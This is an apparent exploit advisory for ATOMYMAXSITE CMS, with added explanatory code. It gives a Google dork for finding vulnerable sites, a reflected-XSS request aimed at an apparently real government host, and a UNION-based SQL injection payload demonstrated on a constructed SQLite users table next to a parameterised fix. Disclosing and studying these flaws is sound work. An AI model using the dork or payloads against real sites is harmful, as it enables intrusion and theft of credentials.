
ATOMYMAXSITE CMS Multiple Vulnerability

Author: Xodiak, Published: 10-05-2015
# Exploit Title: ATOMYMAXSITE CMS Multiple Vulnerability
# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"
# Date: 5/05/2015
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
# Vendor Homepage:N/A
# Software Link: N/A
# Version: All Version
# Tested on: Kali Linux
# CVE : N/A

ATOMYMAXSITE CMS is used by government sites, so these vulnerabilities put the information on those sites at risk of being attacked.

Cross Site Scripting (Reflected)

There is a reflected XSS vulnerability in the search bar (the keyword parameter of index.php?name=search) that can be used in dangerous ways. The proof-of-concept request and the server's response headers follow; the response body is not shown, so the reflection should be confirmed in the returned page source:



GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1
Host: www.pck1.go.th
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95
Connection: keep-alive

HTTP/1.1 200 OK
Date: Tue, 05 May 2015 10:35:21 GMT
Server: Apache/2.2.22 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=tis-620
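A way to confirm the reflection without relying on a browser alert, as an added example that is not from the advisory or from the CMS: the script sets the search keyword to an unusual canary wrapped in a tag, decodes the response the way the headers above require (gzip body, charset tis-620), and reports whether the tag comes back verbatim or entity-encoded. The fetch callbacks, the host name and the page bodies are constructed stand-ins, not captured traffic.

```python
"""Reflected-XSS reflection check (added example; not part of the advisory or the CMS)."""
import gzip
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Unusual token so a hit cannot come from static page text or a cached search.
CANARY = "xq7zq"


def build_probe_url(base_url: str, param: str, payload: str) -> str:
    """Return base_url with `param` set to `payload`; other query params are kept."""
    parts = urlsplit(base_url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = payload
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), parts.fragment))


def decode_body(headers: dict, raw: bytes) -> str:
    """Undo Content-Encoding: gzip and decode with the charset named in Content-Type.

    The response in the advisory is gzip-encoded text/html in charset tis-620; a
    naive UTF-8 decode would mangle Thai text in the page before the check runs.
    """
    if headers.get("Content-Encoding", "").lower() == "gzip":
        raw = gzip.decompress(raw)
    m = re.search(r"charset=([\w-]+)", headers.get("Content-Type", ""), re.I)
    charset = m.group(1) if m else "utf-8"
    return raw.decode(charset, errors="replace")


def classify_reflection(body: str, canary: str = CANARY) -> str:
    """'unescaped' if the probe tag survives verbatim, 'escaped' if only an
    entity-encoded form or the bare token appears, 'none' if the input is not echoed."""
    if f"<{canary}>" in body:
        return "unescaped"
    if canary in body:
        return "escaped"
    return "none"


def probe(base_url: str, param: str, fetch, canary: str = CANARY) -> str:
    """Send one request through `fetch(url) -> (headers, raw_bytes)` and classify the echo."""
    url = build_probe_url(base_url, param, f"<{canary}>")
    headers, raw = fetch(url)
    return classify_reflection(decode_body(headers, raw), canary)


# Constructed responses standing in for a live server (not captured from any site).
_HEADERS = {"Content-Type": "text/html; charset=tis-620", "Content-Encoding": "gzip"}


def fake_vulnerable(url: str):
    """Hypothetical server that echoes the keyword into HTML text without escaping."""
    page = "<html><body>Search: <xq7zq> - 0 results</body></html>"
    return _HEADERS, gzip.compress(page.encode("tis-620"))


def fake_hardened(url: str):
    """Hypothetical server that HTML-entity-encodes the keyword before echoing it."""
    page = "<html><body>Search: &lt;xq7zq&gt; - 0 results</body></html>"
    return _HEADERS, gzip.compress(page.encode("tis-620"))


if __name__ == "__main__":
    base = "http://target.example/main/index.php?name=search&keyword=test"  # assumed host
    print("vulnerable:", probe(base, "keyword", fake_vulnerable))
    print("hardened:  ", probe(base, "keyword", fake_hardened))
```

The bare-tag probe is deliberately narrower than alert(): a canary that comes back unescaped inside HTML text proves the defect, while one that comes back as &lt;...&gt; does not. A keyword that is echoed inside an attribute value would need a quote-breaking probe instead, which this check does not cover.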

SQL Injection

The gallery section has a SQL injection vulnerability through which the whole database can be queried, including all usernames and passwords.
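To make concrete why an injectable gallery lookup exposes the credential table, here is an added example that is not the CMS's own code. The advisory names no parameter, query or table, so the gallery and users tables, their columns and the id parameter are assumptions, and an in-memory SQLite database stands in for the site's real database server. The block runs the vulnerable and the parameterised form of such a lookup against the same UNION payload:

```python
"""Gallery-style SQL injection on a constructed SQLite database.
Added example; schema, column names and the id parameter are assumptions,
not taken from ATOMYMAXSITE."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a gallery table plus the users table an attacker wants."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT, path TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO gallery VALUES (1, 'School trip', '/img/trip.jpg');
        INSERT INTO gallery VALUES (2, 'Sports day', '/img/sports.jpg');
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
        INSERT INTO users VALUES (2, 'editor', 'hash-of-editor-password');
        """
    )
    return db


def gallery_lookup_vulnerable(db: sqlite3.Connection, gallery_id: str):
    """The classic defect: the request parameter is spliced into the SQL text,
    so the value can add clauses to the statement."""
    sql = "SELECT title, path FROM gallery WHERE id = " + gallery_id
    return db.execute(sql).fetchall()


def gallery_lookup_fixed(db: sqlite3.Connection, gallery_id):
    """Parameterised query: the value is bound as data and cannot change the
    statement's structure, whatever it contains."""
    return db.execute("SELECT title, path FROM gallery WHERE id = ?", (gallery_id,)).fetchall()


# Attacker-controlled value for the id parameter (constructed). The column count
# (2) matches the gallery SELECT, so the users rows ride along in the result set.
UNION_PAYLOAD = "0 UNION SELECT username, password FROM users"


def demo():
    """Return (rows leaked by the vulnerable lookup, rows from the fixed lookup)."""
    db = make_db()
    return gallery_lookup_vulnerable(db, UNION_PAYLOAD), gallery_lookup_fixed(db, UNION_PAYLOAD)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable lookup returned:", leaked)
    print("parameterised lookup returned:", safe)
```

The UNION payload only works because the vulnerable function concatenates the id into the statement text; the fixed version passes the very same string as a bound parameter, which is compared as a value against the id column and matches nothing. The same distinction holds for MySQL with prepared statements (mysqli or PDO in PHP), which is the fix the developer would need to apply in the gallery code.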



I hope the developer patches the vulnerabilities. I found 144,000 results for the dork.
Thanks very much.

Greetz :
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza Attacker,MMA Defacer,END3R
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=
